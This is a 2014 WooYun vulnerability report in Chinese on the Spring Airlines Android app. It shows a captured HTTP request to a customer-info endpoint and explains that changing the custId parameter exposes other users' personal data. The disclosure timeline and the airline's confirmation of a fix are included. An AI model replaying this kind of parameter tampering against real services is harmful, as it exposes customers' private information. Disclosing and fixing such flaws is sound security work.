2014-05-01:细节已通知厂商并且等待厂商处理中
2014-05-01:厂商已经确认,细节仅向厂商公开
2014-05-11:细节向核心白帽子及相关领域专家公开
2014-05-21:细节向普通白帽子公开
2014-05-31:细节向实习白帽子公开
2014-06-15:细节向公众公开
听说你们有飞机送o(︶︿︶)o !
详细说明:乌云上血淋淋的案例证实了APP端的薄弱..
所以这次测试我也是从APP端突破
首先我从春秋航空官网下载了春秋航空Android版,然后手机配置好代理了方便抓包
打开APP,登录帐号 在我的账户处-修改个人信息 修改的时候抓包
获取到:
POST /spring3g/remote/wr/getCustInfoService.wr?action=processGetCustInfo_G_220_I_320 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; M353 Build/KOT49H)
Host: m.china-sss.com:8080
Connection: Keep-Alive
Accept-Encoding: gzip
custId=9C0202348612&loginId=XXXXX%40126.com&userId=145267246&terminalType=g&versionNo=5.0.1&moneyClassId=0&subTerminalType=Android&isEmulator=n&lang=zh_CN&deviceSN=XX1138025083805&channelid=1
修改此处的custId
修改后还会有一个请求,不用管直接Forward..
用户信息再次遍历..
漏洞证明:
#可自查
修复方案:见详细说明..差17RANK凑380..不介意的话请给我17RANK
版权声明:转载请注明来源 魇@乌云 漏洞回应 厂商回应:危害等级:高
漏洞Rank:15
确认时间:2014-05-01 18:42
厂商回复:已收到并尽快修复,非常感谢,辛苦了。
最新状态:暂无